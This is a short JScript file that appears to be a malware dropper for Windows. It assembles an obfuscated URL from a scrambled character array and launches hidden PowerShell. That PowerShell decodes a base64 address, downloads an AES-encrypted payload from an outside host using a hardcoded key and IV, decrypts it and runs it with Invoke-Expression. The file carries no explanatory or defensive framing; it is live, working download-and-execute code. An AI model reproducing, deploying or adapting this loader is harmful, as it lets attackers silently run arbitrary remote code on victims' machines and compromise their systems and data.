// ==JS==
var arr = ["h", "t", "R", "t", "p", "A", "s", ":", "q", "/", "/", "w", "i", "c", "n", "s", "g", "u", "p", "p", "o", "r", "t", ".", "x", "c", "b", "f", "S", "d", "/", "d", "i", "N", "n", "t", "e", "N", "r", "n", "e", "t", "T", "v", "/", "C", "s", "f", "y", "s", "t", "e", "m", "i", ".", "p", "S", "h", "p"];
var index = [0, 1, 3, 4, 6, 7, 9, 10, 11, 12, 14, 15, 17, 18, 19, 20, 21, 22, 23, 25, 27, 29, 30, 32, 34, 35, 36, 38, 39, 40, 41, 43, 44, 46, 48, 49, 50, 51, 52, 54, 55, 57, 58];
var url = "";
for (var i = 0; i < index.length; i++) {
    url += arr[index[i]];
}

var shell = new ActiveXObject("WScript.Shell");
var cmd = "powershell -NoProfile -WindowStyle Hidden -Command \"";
cmd += "$u=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93aW5zdXBwb3J0LmNmZC9pbnRlcm5ldHYvc3lzdGVtLnBocA=='));";
cmd += "$k=[Convert]::FromBase64String('GExuxA4j6AKAFIOe46Tj6kDnmISGaSo+s+uSK/gQYaY=');";
cmd += "$i=[Convert]::FromBase64String('u8E1uAurjNhZqQlcVlKSdA==');";
cmd += "$d=(New-Object Net.WebClient).DownloadData($u + '?action=get_payload&key_id=2c924beec2fd40e4');";
cmd += "$a=New-Object Security.Cryptography.AesManaged;";
cmd += "$a.Mode='CBC';$a.Padding='PKCS7';$a.Key=$k;$a.IV=$i;";
cmd += "$t=$a.CreateDecryptor();";
cmd += "$b=$t.TransformFinalBlock($d,0,$d.Length);";
cmd += "$s=[Text.Encoding]::UTF8.GetString($b);";
cmd += "Invoke-Expression $s;";
cmd += "\"";

shell.Run(cmd, 0, false);
